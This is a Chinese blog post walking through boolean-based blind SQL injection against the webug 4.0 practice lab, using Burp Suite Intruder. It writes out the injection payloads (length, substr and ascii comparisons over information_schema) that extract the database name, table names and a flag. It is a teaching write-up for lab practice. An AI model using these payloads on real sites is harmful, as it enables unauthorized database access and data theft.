sql布尔盲注-半自动注入(借用burp suite)

最新推荐文章于 2023-11-17 19:39:21 发布
最新推荐文章于 2023-11-17 19:39:21 发布
阅读量568 收藏 7
点赞数 1
分类专栏: sql注入 文章标签: sql 数据库 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44914783/article/details/120270771
版权

一、盲注介绍

进行注入时,页面不会回显错误,只会显示正常和不正常。

二、借助的函数

  • length() 返回字符串长度
  • substr() 截取字符串
  • ascii() 返回字符的ascii码
  • count() 统计数量

三、爆库(通过webug 4.0 sql盲注介绍)

界面如下:
在这里插入图片描述

爆数据库长度

(1)爆数据库长度
构建注入语句:1’ and length(database())=1#

在burp进行攻击时,将1设置为变量

(2)将语句拼接到url上,使用burp拦截
在这里插入图片描述

在这里插入图片描述
(3)设置变量,选择狙击手模式,添加变量集,
在这里插入图片描述
(4)进行攻击,如图
在这里插入图片描述如图,收集到数据库长度为5

爆数据库名

(1)构建注入语句:1’ and ascii(substr(database(),1,1))=1#
在这里插入图片描述

(2)使用burp拦截
在这里插入图片描述
(3)设置变量,攻击模式选择集速炸弹,参数1遍历库名长度,参数2进行匹配ascii值
在这里插入图片描述参数1
在这里插入图片描述
参数2
在这里插入图片描述
(4)进行攻击
在这里插入图片描述
根据匹配ascii表,得数据库名为webug

四、爆表

爆webug表的数量

(1)构建注入语句:
1’ and (select count(table_name) from information_schema.tables where table_schema=‘webug’)=1#
(2)拼接到url上,用于burp拦截
在这里插入图片描述在这里插入图片描述

(3)设置变量
在这里插入图片描述设置变量集
在这里插入图片描述
进行攻击
在这里插入图片描述
判断出表的数量为7个

依次爆破表名

(1)爆破第一个表名,爆破第一个表名长度
注入语句:1’ and length(substr((select table_name from information_schema.tables where table_schema=‘webug’ limit 0,1),1))=1#

(2)设置变量
在这里插入图片描述

设置变量集
在这里插入图片描述
进行攻击
在这里插入图片描述

获取到第一个表长度为9

(3)开始爆表名
构建注入语句:1’ and ascii(substr((select table_name from information_schema.tables where table_schema=‘webug’ limit 0,1),1,1))=0

(4)构建到url,使用burp进行拦截
在这里插入图片描述(5)设置变量,变量集,进行攻击
在这里插入图片描述
参数1
在这里插入图片描述
参数2
在这里插入图片描述
攻击
在这里插入图片描述
对照ascii码表,可得出第一个表名为:data_crud

五、爆数据

所有的表可根据上述方法依次爆出,比较繁琐,根据webug第一关的经验,第二关的flag也可能在flag表的flag参数中,直接进行爆破
(1)构造注入参数:
1’ and length(substr((select flag from flag),1))=0#
(2)设置参数,进行攻击
在这里插入图片描述
在这里插入图片描述
爆破出flag参数为16位
(3)再进行爆破数据,构造注入语句
1’ and ascii(substr((select flag from flag),1,1))=0
设置变量,进行爆破
在这里插入图片描述
变量1
在这里插入图片描述
变量2
在这里插入图片描述
攻击
在这里插入图片描述
匹配ascii码表,得出数据
dfafdasfafdsadfa

总结:最后得出的flag不是该关的flag,在另外的表上,但是学习方法最重要,找出真正flag只是时间问题,以上可以使用sqlmap跑。

向开花
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
sql注入半自动化扫描工具——报错注入(分析后续补上)
18年3月萌新白帽子
06-11 617
代码展示墙:关于注释和解析以后会补上现在只是先将代码保存在这里# -*- coding: utf-8 -*-import requestsimport sysimport hashlibfrom optparse import OptionParserimport reparser=OptionParser()parser.add_option("-D", "--Database", action...
SQL注入14】布尔盲注半自动化实现(基于BurpSuite工具和sqli-labs-less8靶机平台)
Fighting_hawk的博客
02-21 3120
1. 理解布尔注入的逻辑和原理。 2. 利用BurpSuite代替人工进行试错以减少工作量。 3. 爆破时建议使用ascii值来判断以区分大小写。
SQL注入-14】布尔盲注半自动注入案例—以sqli-labs-less8为例(利用BurpSuite工具)
m0_64378913的博客
05-12 1576
目录1 概述2 布尔盲注半自动注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 爆库名长度及库名2.2.4 爆表名、字段名以及账户及密码3 总结参考文章 本博客内容仅供学习探讨,请勿滥用乱用 1 概述 当改变浏览器带入给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入布尔盲注:一般情况下,当带入参数为真和假时,页面会有不同的反映,比如有无显示也是
使用burpsuite进行布尔盲注(sqli-labs第7关)
J14N的博客
01-30 1132
sqli-labs less-7使用burpsuite布尔盲注(纯小白,刚接触sql注入,有更好的办法欢迎评论区留言)
SQL注入盲注
qq_68233961的博客
07-17 1506
SQL注入布尔盲注和时间盲注
burp-unauth-checker:burpsuite扩展程序,用于检查未经授权的漏洞
04-15
burp-unauth-checker概述自动化检测未授权访问漏洞关于该插件的实现细节,参考快速开始使用时需要勾选launchBurpUnauthChecker,建议在测试需要授权访问的功能时才开启(如网站后台)authParams.cfg:存储授权参数,...
BurpSuite-Xkeys:Burp Suite扩展程序,用于从网页中提取有趣的字符串(密钥,机密,令牌等)
03-20
Xkeys(BurpSuite扩展) 描述 Burp Suite扩展程序,用于从网页中提取有趣的字符串(密钥,机密,令牌等)。并将它们列为信息问题。 类型:无源扫描仪 设置 通过在Burp Suite的“扩展程序”下的“选项”选项卡中提供...
burp-resources-ja:Burp Suite文档日语翻译
04-30
Burp Suite日语文档 本文档是Burp Suite Professional版本随附的文档的日语翻译。 目录 预防措施 不包括企业版。 由我本人翻译,与PortSwigger没有任何关系。对于因使用本文档而引起的任何问题,请不要与Port ...
BurpSuite-collections:BurpSuite收集:包括不限于 Burp 文章、破解版、插件(非BApp Store)、汉化等相关教程,欢迎添砖加瓦---burpsuite-pro burpsuite-extender burpsuite cracked-version hackbar hacktools fuzzing fuzz-testing burp-plugin burp-extensions bapp-store brute-force-attacks brute-force-p
04-24
Burp-Suite-collections BurpSuite 相关收集项目,插件主要是非BApp Store(商店) 所有的破解汉化或者使用burpsuite都是在你配置好了Java环境的前提下!!! burpsuite pro 1.37 crack 破解: 打包了基本的burp,...
【工具跑SQL盲注
07-01 1375
【工具-SQL盲注
布尔盲注(结合BurpSuite暴力破解)
最新发布
weixin_59047731的博客
11-17 653
有些情况下,**开发人员屏蔽了报错信息**,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注盲注根据展现方式,分为**boolean盲注和时间型盲注**。 Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点。 Boolean盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否。
SQL盲注之python脚本爆破及sqlmap基础操作
wangringyi的博客
04-09 6110
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、SQL盲注是什么? 二、介绍与使用 1.盲注的三种分类 2.基于报错的盲注 3.基于时间的脚本化盲注 sqlmap的使用 前言 哈,我是爱挖洞的萝卜头,从今天开始来csdn分享学习过过程,学习经历,望各位大佬指教指教,嘿嘿嘿。 一、SQL盲注是什么? 经历过前面的数字型注入,字符型注入,提交方式注入等,我们对sql注入有了基本的...
sqlilabs第五关布尔盲注burpsuite版)
qq_62044589的博客
04-04 1192
sqlilabs第五关单引号闭合布尔盲注burpsuite
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)
weixin_45116657的博客
08-25 4370
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
使用Burpsuite进行半自动注入 布尔盲注和时间盲注 个人总结
代码审计
03-26 4063
利用前提 , 页面上没有显示位 , 也没有输出 $ QL 语句执行错误信息 。 正确的 SQL 语句和错误的 SQL 语句返回页面都 0 样 , . 但是加入 s 丨 p ( 5 ) 条件之 后 , 页面的返回速度明显慢了 5 秒 。 优点 . 不需要显示位 , 不需要出错信息 。 速度慢 , . 耗费大量时间 。 payload: and if(length(database())=8,sleep(10),1) --+ 判断当前数据库库名的长度 如果数据库库名长度大于等于8,则mysql查询休眠10
SQL注入环境搭建及多种注入类型测试实验
晓宇的博客
04-14 5544
SQL注入环境搭建及多种注入类型测试实验
SQL注入-盲注布尔盲注与时间盲注
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注
burpsuite sql注入漏洞测试(布尔盲注)
07-27
当使用Burp Suite进行SQL注入漏洞测试时,布尔盲注是一种常用的技术之一。布尔盲注是一种盲注攻击技术,它通过在SQL查询中使用布尔逻辑来确定数据库中的信息。以下是一些步骤来测试布尔盲注漏洞: 1. 配置Burp ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

向开花

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值